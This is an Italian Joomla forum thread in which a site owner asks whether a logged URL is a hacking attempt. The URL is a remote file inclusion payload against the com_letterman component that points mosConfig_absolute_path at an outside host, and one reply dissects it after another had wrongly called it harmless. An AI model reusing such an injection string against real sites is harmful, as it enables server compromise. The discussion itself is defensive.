Joomla.it Forum

Non solo Joomla... => Sicurezza => : JoomLena 16 Sep 2008, 16:32:26

: Tentativo di hackeraggio?
: JoomLena 16 Sep 2008, 16:32:26
Qualcuno mi sa dire se questo e un tentativo di hackeraggio?

http://www.feudolampiasi.it/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ezy-hosts.com/pages/posting???
: Re: Tentativo di hackeraggio?
: = odino = 16 Sep 2008, 16:57:29
 ;D  diciamo che non cercava un URL specifica del tuo sito  ;D
: Re: Tentativo di hackeraggio?
: JoomLena 16 Sep 2008, 17:04:39
che vuoldire?
 >:( >:( >:( >:(
: Re: Tentativo di hackeraggio?
: ventus85 16 Sep 2008, 17:20:23
Ti spiego con un esempio:
hai il componente X che fa Y. Tra le configurazioni di questo componente te imposti che sia visibile solo agli iscritti al sito.
Allora se il visitatore (non iscritto) Pippo clicca sul link di quel componente compare quella scritta.

Caso semplice: un forum. Nel menù principale hai il link "forum" e nelle impostazioni del forum c'è scritto che è visibile solo agli iscritti. In tal caso ti viene la scritta "Questo forum è aperto solo agli utenti registrati e loggati.
Se sei già registrato, per favore loggati. ".

E' la stessa cosa che è successo a te.

Stessa cosa succede se un utente clicca sul link di un contenuto statico che però te hai sospeso (non più pubblicato).

Tranquillo, non c'è nessun attacco.

Causa di questo può essere un contenuto non più pubblicato o diritti non concessi a tutti gli utenti.
: Re: Tentativo di hackeraggio?
: = odino = 16 Sep 2008, 19:20:47
Ventus, sei sicura?
: Re: Tentativo di hackeraggio?
: ventus85 16 Sep 2008, 19:34:10
Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".
: Re: Tentativo di hackeraggio?
: JoomLena 16 Sep 2008, 20:11:19
ok azie mille spero di poter stare tranquillo....  ;D ;D ;D ;D
: Re: Tentativo di hackeraggio?
: = odino = 17 Sep 2008, 08:29:05
Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".

nel senso che guardando qua (http://secunia.com/advisories/21044/) la situazione si schiarisce, chi ha digitato quell'URL non l'ha fatto di certo in maniera benevola
: Re: Tentativo di hackeraggio?
: ventus85 17 Sep 2008, 10:40:56
 :o :o

Grazie per l'utile informazione.
: Re: Tentativo di hackeraggio?
: = odino = 17 Sep 2008, 11:38:45
:o :o

Grazie per l'utile informazione.

Ti avviso che la segnalazione della vurnerabilità l'ho trovata stamattina.

Però andando a rigor di logica:

:
http://www.feudolampiasi.it/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ezy-hosts.com/pages/posting???
*** lo traduciamo con ***

Sul dominio

:
http://www.feudolampiasi.it/index.php
attraverso il componente letterman

:
?option=com_letterman&task=view&Itemid=&
imposta la root / path del sito:

:
mosConfig_absolute_path

come segue:

:
http://www.ezy-hosts.com/pages/posting???
***
---
***

Sottolineo che quella vulnerabilità non dovrebbe creare più problemi ora, affliggeva vecchie verisoni di Joomla! a quanto ho capito ( grazie al com_letterman).